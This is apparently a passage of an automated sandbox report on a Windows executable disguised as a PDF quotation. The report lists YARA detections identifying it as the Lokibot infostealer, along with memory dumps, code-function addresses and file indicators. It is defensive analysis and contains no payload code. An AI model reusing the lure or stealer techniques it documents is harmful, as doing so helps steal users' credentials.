Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7332, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: mexnJkivovwH.exe PID: 7908, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: mexnJkivovwH.exe PID: 8124, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Quotation2025-0107pdf.exe

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C07F4 NtQueryInformationProcess,	0_2_018C07F4
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C9751 NtQueryInformationProcess,	0_2_018C9751
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A707F4 NtQueryInformationProcess,	9_2_00A707F4
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A79751 NtQueryInformationProcess,	9_2_00A79751

Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C9558	0_2_018C9558
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C8568	0_2_018C8568
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C1CE8	0_2_018C1CE8
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C1478	0_2_018C1478
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C2710	0_2_018C2710
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018CA298	0_2_018CA298
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C3610	0_2_018C3610
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C5DC8	0_2_018C5DC8
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C35F9	0_2_018C35F9
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C5908	0_2_018C5908
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C5918	0_2_018C5918
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C9547	0_2_018C9547
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C08D8	0_2_018C08D8
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C8828	0_2_018C8828
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C143F	0_2_018C143F
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C8838	0_2_018C8838
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C9860	0_2_018C9860
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C9870	0_2_018C9870
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C5BD0	0_2_018C5BD0
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C5BE0	0_2_018C5BE0
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C1728	0_2_018C1728
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C3A8A	0_2_018C3A8A
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C56D0	0_2_018C56D0
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_018C56E0	0_2_018C56E0
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0305C324	0_2_0305C324
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_03051478	0_2_03051478
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0305C318	0_2_0305C318
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0305D351	0_2_0305D351
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0305B208	0_2_0305B208
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_030591EC	0_2_030591EC
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_03051469	0_2_03051469
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A08B260	0_2_0A08B260
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A08B2BC	0_2_0A08B2BC
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A087394	0_2_0A087394
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A08CF30	0_2_0A08CF30
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A084D38	0_2_0A084D38
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B38C0	0_2_0A1B38C0
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B0730	0_2_0A1B0730
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1BCB50	0_2_0A1BCB50
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1BB8B0	0_2_0A1BB8B0
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B38D9	0_2_0A1B38D9
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B2C68	0_2_0A1B2C68
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1BB00E	0_2_0A1BB00E
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1BB040	0_2_0A1BB040
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B0720	0_2_0A1B0720
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B0428	0_2_0A1B0428
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1B0448	0_2_0A1B0448
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1BB478	0_2_0A1BB478
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_0A1BD538	0_2_0A1BD538
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Code function: 0_2_12512A30	0_2_12512A30
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A7A298	9_2_00A7A298
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A71CE8	9_2_00A71CE8
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A71478	9_2_00A71478
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A78570	9_2_00A78570
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A79558	9_2_00A79558
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A73610	9_2_00A73610
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A72710	9_2_00A72710
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A708D8	9_2_00A708D8
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A78828	9_2_00A78828
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A78838	9_2_00A78838
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A79860	9_2_00A79860
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A79870	9_2_00A79870
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A75908	9_2_00A75908
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A75918	9_2_00A75918
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A7A288	9_2_00A7A288
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A73A90	9_2_00A73A90
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A75BE0	9_2_00A75BE0
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A713EC	9_2_00A713EC
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A75BD0	9_2_00A75BD0
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A7A5A5	9_2_00A7A5A5
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A75DC8	9_2_00A75DC8
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A73518	9_2_00A73518
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A79547	9_2_00A79547
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A756E0	9_2_00A756E0
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A756D0	9_2_00A756D0
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_00A71728	9_2_00A71728
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_023FC324	9_2_023FC324
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_023FD387	9_2_023FD387
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_023F1478	9_2_023F1478
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_023FB208	9_2_023FB208
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_023FB203	9_2_023FB203
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_023F91EC	9_2_023F91EC
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_023F1469	9_2_023F1469
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_04A92238	9_2_04A92238
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_04A92DEF	9_2_04A92DEF
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F338E8	9_2_08F338E8
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F30730	9_2_08F30730
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F338D9	9_2_08F338D9
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F3D818	9_2_08F3D818
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F3BB90	9_2_08F3BB90
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F3CE30	9_2_08F3CE30
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F3B320	9_2_08F3B320
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F30448	9_2_08F30448
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F30428	9_2_08F30428
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F3B758	9_2_08F3B758
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 9_2_08F30720	9_2_08F30720
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 13_2_0040549C	13_2_0040549C
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: 13_2_004029D4	13_2_004029D4

Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: String function: 00405B6F appears 42 times

Source: Quotation2025-0107pdf.exe

Static PE information: invalid certificate

Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720797556.0000000009A00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Quotation2025-0107pdf.exe
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1714510226.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Quotation2025-0107pdf.exe
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1724388342.000000000D390000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Quotation2025-0107pdf.exe
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1710408337.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Quotation2025-0107pdf.exe
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Quotation2025-0107pdf.exe
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Quotation2025-0107pdf.exe
Source: Quotation2025-0107pdf.exe, 00000000.00000000.1651290474.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTbSC.exe: vs Quotation2025-0107pdf.exe
Source: Quotation2025-0107pdf.exe	Binary or memory string: OriginalFilenameTbSC.exe: vs Quotation2025-0107pdf.exe

Source: Quotation2025-0107pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
